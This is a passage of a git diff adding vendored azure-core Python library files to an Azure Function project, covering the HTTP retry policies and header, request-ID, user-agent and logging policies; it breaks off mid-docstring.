+ BACKOFF_MAX = 120 + _SAFE_CODES = set(range(506)) - set([408, 429, 500, 502, 503, 504]) + _RETRY_CODES = set(range(999)) - _SAFE_CODES + + def __init__(self, **kwargs): + self.total_retries = kwargs.pop('retry_total', 10) + self.connect_retries = kwargs.pop('retry_connect', 3) + self.read_retries = kwargs.pop('retry_read', 3) + self.status_retries = kwargs.pop('retry_status', 3) + self.backoff_factor = kwargs.pop('retry_backoff_factor', 0.8) + self.backoff_max = kwargs.pop('retry_backoff_max', self.BACKOFF_MAX) + self.retry_mode = kwargs.pop('retry_mode', RetryMode.Exponential) + self.timeout = kwargs.pop('timeout', 604800) + + retry_codes = self._RETRY_CODES + status_codes = kwargs.pop('retry_on_status_codes', []) + self._retry_on_status_codes = set(status_codes) | retry_codes + self._method_whitelist = frozenset(['HEAD', 'GET', 'PUT', 'DELETE', 'OPTIONS', 'TRACE']) + self._respect_retry_after_header = True + super(RetryPolicyBase, self).__init__() + + @classmethod + def no_retries(cls): + """Disable retries. + """ + return cls(retry_total=0) + + def configure_retries(self, options): + """Configures the retry settings. + + :param options: keyword arguments from context. + :return: A dict containing settings and history for retries. + :rtype: dict + """ + return { + 'total': options.pop("retry_total", self.total_retries), + 'connect': options.pop("retry_connect", self.connect_retries), + 'read': options.pop("retry_read", self.read_retries), + 'status': options.pop("retry_status", self.status_retries), + 'backoff': options.pop("retry_backoff_factor", self.backoff_factor), + 'max_backoff': options.pop("retry_backoff_max", self.BACKOFF_MAX), + 'methods': options.pop("retry_on_methods", self._method_whitelist), + 'timeout': options.pop("timeout", self.timeout), + 'history': [] + } + + def get_backoff_time(self, settings): + """Returns the current backoff time. + + :param dict settings: The retry settings. + :return: The current backoff value. + :rtype: float + """ + # We want to consider only the last consecutive errors sequence (Ignore redirects). + consecutive_errors_len = len(settings['history']) + if consecutive_errors_len <= 1: + return 0 + + if self.retry_mode == RetryMode.Fixed: + backoff_value = settings['backoff'] + else: + backoff_value = settings['backoff'] * (2 ** (consecutive_errors_len - 1)) + return min(settings['max_backoff'], backoff_value) + + def parse_retry_after(self, retry_after): + """Helper to parse Retry-After and get value in seconds. + + :param str retry_after: Retry-After header + :rtype: float + """ + return _utils.parse_retry_after(retry_after) + + def get_retry_after(self, response): + """Get the value of Retry-After in seconds. + + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: Value of Retry-After in seconds. + :rtype: float or None + """ + return _utils.get_retry_after(response) + + def _is_connection_error(self, err): + """Errors when we're fairly sure that the server did not receive the + request, so it should be safe to retry. + """ + return isinstance(err, ServiceRequestError) + + def _is_read_error(self, err): + """Errors that occur after the request has been started, so we should + assume that the server began processing it. + """ + return isinstance(err, ServiceResponseError) + + def _is_method_retryable(self, settings, request, response=None): + """Checks if a given HTTP method should be retried upon, depending if + it is included on the method allowlist. 
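To make the arithmetic in `get_backoff_time` concrete, here is a stand-alone mirror of it under the default settings (exponential mode, backoff factor 0.8, cap of 120 seconds); the integer argument plays the role of `len(settings['history'])`:

```python
def backoff_time(consecutive_errors: int, factor: float = 0.8, cap: float = 120.0) -> float:
    # Mirrors RetryPolicyBase.get_backoff_time in exponential mode.
    if consecutive_errors <= 1:
        return 0.0
    return min(cap, factor * (2 ** (consecutive_errors - 1)))

assert backoff_time(1) == 0.0   # first failure: retry immediately
assert backoff_time(2) == 1.6   # 0.8 * 2
assert backoff_time(3) == 3.2   # 0.8 * 4
```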
+ + :param dict settings: The retry settings. + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :return: True if method should be retried upon. False if not in method allowlist. + :rtype: bool + """ + if response and request.method.upper() in ['POST', 'PATCH'] and \ + response.status_code in [500, 503, 504]: + return True + if request.method.upper() not in settings['methods']: + return False + + return True + + def is_retry(self, settings, response): + """Checks if method/status code is retryable. + + Based on allowlists and control variables such as the number of + total retries to allow, whether to respect the Retry-After header, + whether this header is present, and whether the returned status + code is on the list of status codes to be retried upon on the + presence of the aforementioned header. + + The behavior is: + - If status_code < 400: don't retry + - Else if Retry-After present: retry + - Else: retry based on the safe status code list ([408, 429, 500, 502, 503, 504]) + + + :param dict settings: The retry settings. + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: True if method/status code is retryable. False if not retryable. + :rtype: bool + """ + if response.http_response.status_code < 400: + return False + has_retry_after = bool(response.http_response.headers.get("Retry-After")) + if has_retry_after and self._respect_retry_after_header: + return True + if not self._is_method_retryable(settings, response.http_request, response=response.http_response): + return False + return settings['total'] and response.http_response.status_code in self._retry_on_status_codes + + def is_exhausted(self, settings): + """Checks if any retries left. + + :param dict settings: the retry settings + :return: False if have more retries. True if retries exhausted. + :rtype: bool + """ + retry_counts = (settings['total'], settings['connect'], settings['read'], settings['status']) + retry_counts = list(filter(None, retry_counts)) + if not retry_counts: + return False + + return min(retry_counts) < 0 + + def increment(self, settings, response=None, error=None): + """Increment the retry counters. + + :param settings: The retry settings. + :param response: A pipeline response object. + :type response: ~azure.core.pipeline.PipelineResponse + :param error: An error encountered during the request, or + None if the response was received successfully. + :return: Whether any retry attempt is available + True if more retry attempts available, False otherwise + :rtype: bool + """ + settings['total'] -= 1 + + if isinstance(response, PipelineResponse) and response.http_response.status_code == 202: + return False + + if error and self._is_connection_error(error): + # Connect retry? + settings['connect'] -= 1 + settings['history'].append(RequestHistory(response.http_request, error=error)) + + elif error and self._is_read_error(error): + # Read retry? 
+            settings['read'] -= 1
+            if hasattr(response, 'http_request'):
+                settings['history'].append(RequestHistory(response.http_request, error=error))
+
+        else:
+            # Incrementing because of a server error like a 500 in
+            # status_forcelist and the given method is in the allowlist
+            if response:
+                settings['status'] -= 1
+                if hasattr(response, 'http_request') and hasattr(response, 'http_response'):
+                    settings['history'].append(
+                        RequestHistory(
+                            response.http_request,
+                            http_response=response.http_response
+                        )
+                    )
+
+        if self.is_exhausted(settings):
+            return False
+
+        if response.http_request.body and hasattr(response.http_request.body, 'read'):
+            if 'body_position' not in settings:
+                return False
+            try:
+                # attempt to rewind the body to the initial position
+                response.http_request.body.seek(settings['body_position'], SEEK_SET)
+            except (UnsupportedOperation, ValueError, AttributeError):
+                # if body is not seekable, then retry would not work
+                return False
+        file_positions = settings.get('file_positions')
+        if response.http_request.files and file_positions:
+            try:
+                for value in response.http_request.files.values():
+                    file_name, body = value[0], value[1]
+                    if file_name in file_positions:
+                        position = file_positions[file_name]
+                        body.seek(position, SEEK_SET)
+            except (UnsupportedOperation, ValueError, AttributeError):
+                # if body is not seekable, then retry would not work
+                return False
+        return True
+
+    def update_context(self, context, retry_settings):
+        """Updates retry history in pipeline context.
+
+        :param context: The pipeline context.
+        :type context: ~azure.core.pipeline.PipelineContext
+        :param retry_settings: The retry settings.
+        :type retry_settings: dict
+        """
+        if retry_settings['history']:
+            context['history'] = retry_settings['history']
+
+    def _configure_timeout(self, request, absolute_timeout, is_response_error):
+        if absolute_timeout <= 0:
+            if is_response_error:
+                raise ServiceResponseTimeoutError('Response timeout')
+            raise ServiceRequestTimeoutError('Request timeout')
+
+        # if connection_timeout is already set, ensure it doesn't exceed absolute_timeout
+        connection_timeout = request.context.options.get('connection_timeout')
+        if connection_timeout:
+            request.context.options["connection_timeout"] = min(connection_timeout, absolute_timeout)
+
+        # otherwise, try to ensure the transport's configured connection_timeout doesn't exceed absolute_timeout
+        # ("connection_config" isn't defined on Async/HttpTransport but all implementations in this library have it)
+        elif hasattr(request.context.transport, "connection_config"):
+            default_timeout = getattr(request.context.transport.connection_config, "timeout", absolute_timeout)
+            try:
+                if absolute_timeout < default_timeout:
+                    request.context.options["connection_timeout"] = absolute_timeout
+            except TypeError:
+                # transport.connection_config.timeout is something unexpected (not a number)
+                pass
+
+    def _configure_positions(self, request, retry_settings):
+        body_position = None
+        file_positions = None
+        if request.http_request.body and hasattr(request.http_request.body, 'read'):
+            try:
+                body_position = request.http_request.body.tell()
+            except (AttributeError, UnsupportedOperation):
+                # if body position cannot be obtained, then retries will not work
+                pass
+        else:
+            if request.http_request.files:
+                file_positions = {}
+                try:
+                    for value in request.http_request.files.values():
+                        name, body = value[0], value[1]
+                        if name and body and hasattr(body, 'read'):
+                            position = body.tell()
+                            file_positions[name] = position
+                except (AttributeError, UnsupportedOperation):
+                    file_positions = None
+
+        retry_settings['body_position'] = body_position
+        retry_settings['file_positions'] = file_positions
+
+class RetryPolicy(RetryPolicyBase, HTTPPolicy):
+    """A retry policy.
+
+    The retry policy in the pipeline can be configured directly, or tweaked on a per-call basis.
+
+    :keyword int retry_total: Total number of retries to allow. Takes precedence over other counts.
+     Default value is 10.
+
+    :keyword int retry_connect: How many connection-related errors to retry on.
+     These are errors raised before the request is sent to the remote server,
+     which we assume has not triggered the server to process the request. Default value is 3.
+
+    :keyword int retry_read: How many times to retry on read errors.
+     These errors are raised after the request was sent to the server, so the
+     request may have side-effects. Default value is 3.
+
+    :keyword int retry_status: How many times to retry on bad status codes. Default value is 3.
+
+    :keyword float retry_backoff_factor: A backoff factor to apply between attempts after the second try
+     (most errors are resolved immediately by a second try without a delay).
+     In fixed mode, retry policy will always sleep for {backoff factor}.
+     In 'exponential' mode, retry policy will sleep for: `{backoff factor} * (2 ** ({number of total retries} - 1))`
+     seconds. If the backoff_factor is 0.1, then the retry will sleep
+     for [0.0s, 0.2s, 0.4s, ...] between retries. The default value is 0.8.
+
+    :keyword int retry_backoff_max: The maximum back off time. Default value is 120 seconds (2 minutes).
+
+    :keyword RetryMode retry_mode: Fixed or exponential delay between attempts, default is exponential.
+
+    :keyword int timeout: Timeout setting for the operation in seconds, default is 604800s (7 days).
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/test_example_sync.py
+            :start-after: [START retry_policy]
+            :end-before: [END retry_policy]
+            :language: python
+            :dedent: 4
+            :caption: Configuring a retry policy.
+    """
+    def _sleep_for_retry(self, response, transport):
+        """Sleep based on the Retry-After response header value.
+
+        :param response: The PipelineResponse object.
+        :type response: ~azure.core.pipeline.PipelineResponse
+        :param transport: The HTTP transport type.
+        """
+        retry_after = self.get_retry_after(response)
+        if retry_after:
+            transport.sleep(retry_after)
+            return True
+        return False
+
+    def _sleep_backoff(self, settings, transport):
+        """Sleep using exponential backoff. Immediately returns if backoff is 0.
+
+        :param dict settings: The retry settings.
+        :param transport: The HTTP transport type.
+        """
+        backoff = self.get_backoff_time(settings)
+        if backoff <= 0:
+            return
+        transport.sleep(backoff)
+
+    def sleep(self, settings, transport, response=None):
+        """Sleep between retry attempts.
+
+        This method will respect a server's ``Retry-After`` response header
+        and sleep the duration of the time requested. If that is not present, it
+        will use an exponential backoff. By default, the backoff factor is 0 and
+        this method will return immediately.
+
+        :param dict settings: The retry settings.
+        :param transport: The HTTP transport type.
+        :param response: The PipelineResponse object.
+        :type response: ~azure.core.pipeline.PipelineResponse
+        """
+        if response:
+            slept = self._sleep_for_retry(response, transport)
+            if slept:
+                return
+        self._sleep_backoff(settings, transport)
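Before the `send` implementation below, a quick configuration sketch using the keywords documented on the class (the values are arbitrary):

```python
from azure.core.pipeline.policies import RetryPolicy, RetryMode

retry_policy = RetryPolicy(
    retry_total=5,
    retry_read=2,
    retry_backoff_factor=0.5,
    retry_mode=RetryMode.Fixed,   # sleep a constant 0.5s between attempts
    timeout=120,                  # overall budget instead of the 7-day default
)

no_retries = RetryPolicy.no_retries()  # classmethod shorthand for retry_total=0
```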
+    def send(self, request):
+        """Sends the PipelineRequest object to the next policy. Uses retry settings if necessary.
+
+        :param request: The PipelineRequest object
+        :type request: ~azure.core.pipeline.PipelineRequest
+        :return: Returns the PipelineResponse or raises error if maximum retries exceeded.
+        :rtype: ~azure.core.pipeline.PipelineResponse
+        :raises: ~azure.core.exceptions.AzureError if maximum retries exceeded.
+        :raises: ~azure.core.exceptions.ClientAuthenticationError if authentication fails.
+        """
+        retry_active = True
+        response = None
+        retry_settings = self.configure_retries(request.context.options)
+        self._configure_positions(request, retry_settings)
+
+        absolute_timeout = retry_settings['timeout']
+        is_response_error = True
+
+        while retry_active:
+            try:
+                start_time = time.time()
+                self._configure_timeout(request, absolute_timeout, is_response_error)
+                response = self.next.send(request)
+                if self.is_retry(retry_settings, response):
+                    retry_active = self.increment(retry_settings, response=response)
+                    if retry_active:
+                        self.sleep(retry_settings, request.context.transport, response=response)
+                        is_response_error = True
+                        continue
+                break
+            except ClientAuthenticationError:  # pylint:disable=try-except-raise
+                # the authentication policy failed such that the client's request can't
+                # succeed--we'll never have a response to it, so propagate the exception
+                raise
+            except AzureError as err:
+                if absolute_timeout > 0 and self._is_method_retryable(retry_settings, request.http_request):
+                    retry_active = self.increment(retry_settings, response=request, error=err)
+                    if retry_active:
+                        self.sleep(retry_settings, request.context.transport)
+                        if isinstance(err, ServiceRequestError):
+                            is_response_error = False
+                        else:
+                            is_response_error = True
+                        continue
+                raise err
+            finally:
+                end_time = time.time()
+                if absolute_timeout:
+                    absolute_timeout -= (end_time - start_time)
+
+        self.update_context(response.context, retry_settings)
+        return response
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry_async.py
new file mode 100644
index 0000000..31930ec
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry_async.py
@@ -0,0 +1,176 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import logging +import time +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import + +from azure.core.exceptions import ( + AzureError, + ClientAuthenticationError, + ServiceRequestError, +) +from ._base_async import AsyncHTTPPolicy +from ._retry import RetryPolicyBase + +_LOGGER = logging.getLogger(__name__) + + + +class AsyncRetryPolicy(RetryPolicyBase, AsyncHTTPPolicy): + """Async flavor of the retry policy. + + The async retry policy in the pipeline can be configured directly, or tweaked on a per-call basis. + + :keyword int retry_total: Total number of retries to allow. Takes precedence over other counts. + Default value is 10. + + :keyword int retry_connect: How many connection-related errors to retry on. + These are errors raised before the request is sent to the remote server, + which we assume has not triggered the server to process the request. Default value is 3. + + :keyword int retry_read: How many times to retry on read errors. + These errors are raised after the request was sent to the server, so the + request may have side-effects. Default value is 3. + + :keyword int retry_status: How many times to retry on bad status codes. Default value is 3. + + :keyword float retry_backoff_factor: A backoff factor to apply between attempts after the second try + (most errors are resolved immediately by a second try without a delay). + Retry policy will sleep for: `{backoff factor} * (2 ** ({number of total retries} - 1))` + seconds. If the backoff_factor is 0.1, then the retry will sleep + for [0.0s, 0.2s, 0.4s, ...] between retries. The default value is 0.8. + + :keyword int retry_backoff_max: The maximum back off time. Default value is 120 seconds (2 minutes). + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START async_retry_policy] + :end-before: [END async_retry_policy] + :language: python + :dedent: 4 + :caption: Configuring an async retry policy. + """ + + async def _sleep_for_retry(self, response, transport): # pylint:disable=invalid-overridden-method + """Sleep based on the Retry-After response header value. + + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :param transport: The HTTP transport type. + """ + retry_after = self.get_retry_after(response) + if retry_after: + await transport.sleep(retry_after) + return True + return False + + async def _sleep_backoff(self, settings, transport): # pylint:disable=invalid-overridden-method + """Sleep using exponential backoff. Immediately returns if backoff is 0. + + :param dict settings: The retry settings. + :param transport: The HTTP transport type. + """ + backoff = self.get_backoff_time(settings) + if backoff <= 0: + return + await transport.sleep(backoff) + + async def sleep(self, settings, transport, response=None): # pylint:disable=invalid-overridden-method + """Sleep between retry attempts. 
+ + This method will respect a server's ``Retry-After`` response header + and sleep the duration of the time requested. If that is not present, it + will use an exponential backoff. By default, the backoff factor is 0 and + this method will return immediately. + + :param dict settings: The retry settings. + :param transport: The HTTP transport type. + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + """ + if response: + slept = await self._sleep_for_retry(response, transport) + if slept: + return + await self._sleep_backoff(settings, transport) + + async def send(self, request): # pylint:disable=invalid-overridden-method + """Uses the configured retry policy to send the request to the next policy in the pipeline. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raise: ~azure.core.exceptions.AzureError if maximum retries exceeded. + :raise: ~azure.core.exceptions.ClientAuthenticationError if authentication fails + """ + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + self._configure_positions(request, retry_settings) + + absolute_timeout = retry_settings['timeout'] + is_response_error = True + + while retry_active: + try: + start_time = time.time() + self._configure_timeout(request, absolute_timeout, is_response_error) + response = await self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + await self.sleep(retry_settings, request.context.transport, response=response) + is_response_error = True + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except AzureError as err: + if absolute_timeout > 0 and self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + await self.sleep(retry_settings, request.context.transport) + if isinstance(err, ServiceRequestError): + is_response_error = False + else: + is_response_error = True + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_universal.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_universal.py new file mode 100644 index 0000000..5e1acc4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_universal.py @@ -0,0 +1,701 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
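A sketch of the async flavor in use, assuming aiohttp is installed for `AioHttpTransport`; the URL is a placeholder and the policy order is illustrative (retry wraps redirect here):

```python
from azure.core.pipeline import AsyncPipeline
from azure.core.pipeline.policies import AsyncRedirectPolicy, AsyncRetryPolicy
from azure.core.pipeline.transport import AioHttpTransport, HttpRequest

async def fetch_status(url: str) -> int:
    async with AsyncPipeline(
        AioHttpTransport(),
        policies=[AsyncRetryPolicy(retry_total=3), AsyncRedirectPolicy()],
    ) as pipeline:
        response = await pipeline.run(HttpRequest("GET", url))
        return response.http_response.status_code
```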
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import json +import inspect +import logging +import os +import platform +import xml.etree.ElementTree as ET +import types +import re +import uuid +from typing import (Mapping, IO, TypeVar, TYPE_CHECKING, Type, cast, List, Callable, Iterator, # pylint: disable=unused-import + Any, Union, Dict, Optional, AnyStr) +from six.moves import urllib + +from azure.core import __version__ as azcore_version +from azure.core.exceptions import ( + DecodeError, + raise_with_traceback +) + +from azure.core.pipeline import PipelineRequest, PipelineResponse +from ._base import SansIOHTTPPolicy + +if TYPE_CHECKING: + from azure.core.pipeline.transport import HttpResponse, AsyncHttpResponse + +_LOGGER = logging.getLogger(__name__) +ContentDecodePolicyType = TypeVar('ContentDecodePolicyType', bound='ContentDecodePolicy') +HTTPRequestType = TypeVar("HTTPRequestType") +HTTPResponseType = TypeVar("HTTPResponseType") + + +class HeadersPolicy(SansIOHTTPPolicy): + """A simple policy that sends the given headers with the request. + + This will overwrite any headers already defined in the request. Headers can be + configured up front, where any custom headers will be applied to all outgoing + operations, and additional headers can also be added dynamically per operation. + + :param dict base_headers: Headers to send with the request. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START headers_policy] + :end-before: [END headers_policy] + :language: python + :dedent: 4 + :caption: Configuring a headers policy. + """ + def __init__(self, base_headers=None, **kwargs): # pylint: disable=super-init-not-called + # type: (Dict[str, str], Any) -> None + self._headers = base_headers or {} + self._headers.update(kwargs.pop('headers', {})) + + @property + def headers(self): + """The current headers collection.""" + return self._headers + + def add_header(self, key, value): + """Add a header to the configuration to be applied to all requests. + + :param str key: The header. + :param str value: The header's value. 
+    """
+        self._headers[key] = value
+
+    def on_request(self, request):
+        # type: (PipelineRequest) -> None
+        """Updates with the given headers before sending the request to the next policy.
+
+        :param request: The PipelineRequest object
+        :type request: ~azure.core.pipeline.PipelineRequest
+        """
+        request.http_request.headers.update(self.headers)
+        additional_headers = request.context.options.pop('headers', {})
+        if additional_headers:
+            request.http_request.headers.update(additional_headers)
+
+class _Unset(object):
+    pass
+
+class RequestIdPolicy(SansIOHTTPPolicy):
+    """A simple policy that sets the given request id in the header.
+
+    This will overwrite any request id that is already defined in the request. The request id can be
+    configured up front, in which case it is applied to all outgoing
+    operations, and a request id can also be set dynamically per operation.
+
+    :keyword str request_id: The request id to be added into the header.
+    :keyword bool auto_request_id: Automatically generates a unique request ID per call if true. Defaults to True.
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/test_example_sansio.py
+            :start-after: [START request_id_policy]
+            :end-before: [END request_id_policy]
+            :language: python
+            :dedent: 4
+            :caption: Configuring a request id policy.
+    """
+    def __init__(self, **kwargs):  # pylint: disable=super-init-not-called
+        # type: (dict) -> None
+        self._request_id = kwargs.pop('request_id', _Unset)
+        self._auto_request_id = kwargs.pop('auto_request_id', True)
+
+    def set_request_id(self, value):
+        """Add the request id to the configuration to be applied to all requests.
+
+        :param str value: The request id value.
+        """
+        self._request_id = value
+
+    def on_request(self, request):
+        # type: (PipelineRequest) -> None
+        """Updates with the given request id before sending the request to the next policy.
+
+        :param request: The PipelineRequest object
+        :type request: ~azure.core.pipeline.PipelineRequest
+        """
+        request_id = unset = object()
+        if 'request_id' in request.context.options:
+            request_id = request.context.options.pop('request_id')
+            if request_id is None:
+                return
+        elif self._request_id is None:
+            return
+        elif self._request_id is not _Unset:
+            if "x-ms-client-request-id" in request.http_request.headers:
+                return
+            request_id = self._request_id
+        elif self._auto_request_id:
+            if "x-ms-client-request-id" in request.http_request.headers:
+                return
+            request_id = str(uuid.uuid1())
+        if request_id is not unset:
+            header = {"x-ms-client-request-id": request_id}
+            request.http_request.headers.update(header)
+
+class UserAgentPolicy(SansIOHTTPPolicy):
+    """User-Agent Policy. Allows custom values to be added to the User-Agent header.
+
+    :param str base_user_agent: Sets the base user agent value.
+
+    :keyword bool user_agent_overwrite: Overwrites User-Agent when True. Defaults to False.
+    :keyword bool user_agent_use_env: Gets user-agent from environment. Defaults to True.
+    :keyword str user_agent: If specified, this will be added in front of the user agent string.
+    :keyword str sdk_moniker: If specified, the user agent string will be
+        azsdk-python-[sdk_moniker] Python/[python_version] ([platform_version])
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/test_example_sansio.py
+            :start-after: [START user_agent_policy]
+            :end-before: [END user_agent_policy]
+            :language: python
+            :dedent: 4
+            :caption: Configuring a user agent policy.
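
And a corresponding sketch for ``RequestIdPolicy``:

```python
from azure.core.pipeline.policies import RequestIdPolicy

request_id_policy = RequestIdPolicy(request_id='my-fixed-id')  # one id for all calls
request_id_policy.set_request_id('another-id')                 # replace it later
# With no explicit id and auto_request_id=True (the default), a fresh
# uuid1-based value is written to x-ms-client-request-id on each request.
```
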
+ """ + _USERAGENT = "User-Agent" + _ENV_ADDITIONAL_USER_AGENT = 'AZURE_HTTP_USER_AGENT' + + def __init__(self, base_user_agent=None, **kwargs): # pylint: disable=super-init-not-called + # type: (Optional[str], **Any) -> None + self.overwrite = kwargs.pop('user_agent_overwrite', False) + self.use_env = kwargs.pop('user_agent_use_env', True) + application_id = kwargs.pop('user_agent', None) + sdk_moniker = kwargs.pop('sdk_moniker', 'core/{}'.format(azcore_version)) + + if base_user_agent: + self._user_agent = base_user_agent + else: + self._user_agent = "azsdk-python-{} Python/{} ({})".format( + sdk_moniker, + platform.python_version(), + platform.platform() + ) + + if application_id: + self._user_agent = "{} {}".format(application_id, self._user_agent) + + @property + def user_agent(self): + # type: () -> str + """The current user agent value.""" + if self.use_env: + add_user_agent_header = os.environ.get(self._ENV_ADDITIONAL_USER_AGENT, None) + if add_user_agent_header is not None: + return "{} {}".format(self._user_agent, add_user_agent_header) + return self._user_agent + + def add_user_agent(self, value): + # type: (str) -> None + """Add value to current user agent with a space. + :param str value: value to add to user agent. + """ + self._user_agent = "{} {}".format(self._user_agent, value) + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Modifies the User-Agent header before the request is sent. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + """ + http_request = request.http_request + options_dict = request.context.options + if 'user_agent' in options_dict: + user_agent = options_dict.pop('user_agent') + if options_dict.pop('user_agent_overwrite', self.overwrite): + http_request.headers[self._USERAGENT] = user_agent + else: + user_agent = "{} {}".format(user_agent, self.user_agent) + http_request.headers[self._USERAGENT] = user_agent + + elif self.overwrite or self._USERAGENT not in http_request.headers: + http_request.headers[self._USERAGENT] = self.user_agent + + +class NetworkTraceLoggingPolicy(SansIOHTTPPolicy): + + """The logging policy in the pipeline is used to output HTTP network trace to the configured logger. + + This accepts both global configuration, and per-request level with "enable_http_logger" + + :param bool logging_enable: Use to enable per operation. Defaults to False. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START network_trace_logging_policy] + :end-before: [END network_trace_logging_policy] + :language: python + :dedent: 4 + :caption: Configuring a network trace logging policy. + """ + def __init__(self, logging_enable=False, **kwargs): # pylint: disable=unused-argument + self.enable_http_logger = logging_enable + + def on_request(self, request): # pylint: disable=too-many-return-statements + # type: (PipelineRequest) -> None + """Logs HTTP request to the DEBUG logger. + + :param request: The PipelineRequest object. 
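
A sketch of ``UserAgentPolicy`` in use; the exact Python/platform suffix will vary by environment:

```python
from azure.core.pipeline.policies import UserAgentPolicy

ua_policy = UserAgentPolicy(user_agent='myapp/1.0', sdk_moniker='mylib/2.0')
print(ua_policy.user_agent)
# -> roughly "myapp/1.0 azsdk-python-mylib/2.0 Python/3.9.13 (Linux-...)"
ua_policy.add_user_agent('extra-tag')  # appended with a space separator
```
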
+ :type request: ~azure.core.pipeline.PipelineRequest + """ + http_request = request.http_request + options = request.context.options + logging_enable = options.pop("logging_enable", self.enable_http_logger) + request.context["logging_enable"] = logging_enable + if logging_enable: + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + try: + log_string = "Request URL: '{}'".format(http_request.url) + log_string += "\nRequest method: '{}'".format(http_request.method) + log_string += "\nRequest headers:" + for header, value in http_request.headers.items(): + log_string += "\n '{}': '{}'".format(header, value) + log_string += "\nRequest body:" + + # We don't want to log the binary data of a file upload. + if isinstance(http_request.body, types.GeneratorType): + log_string += "\nFile upload" + _LOGGER.debug(log_string) + return + try: + if isinstance(http_request.body, types.AsyncGeneratorType): + log_string += "\nFile upload" + _LOGGER.debug(log_string) + return + except AttributeError: + pass + if http_request.body: + log_string += "\n{}".format(str(http_request.body)) + _LOGGER.debug(log_string) + return + log_string += "\nThis request has no body" + _LOGGER.debug(log_string) + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log request: %r", err) + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + """Logs HTTP response to the DEBUG logger. + + :param request: The PipelineRequest object. + :type request: 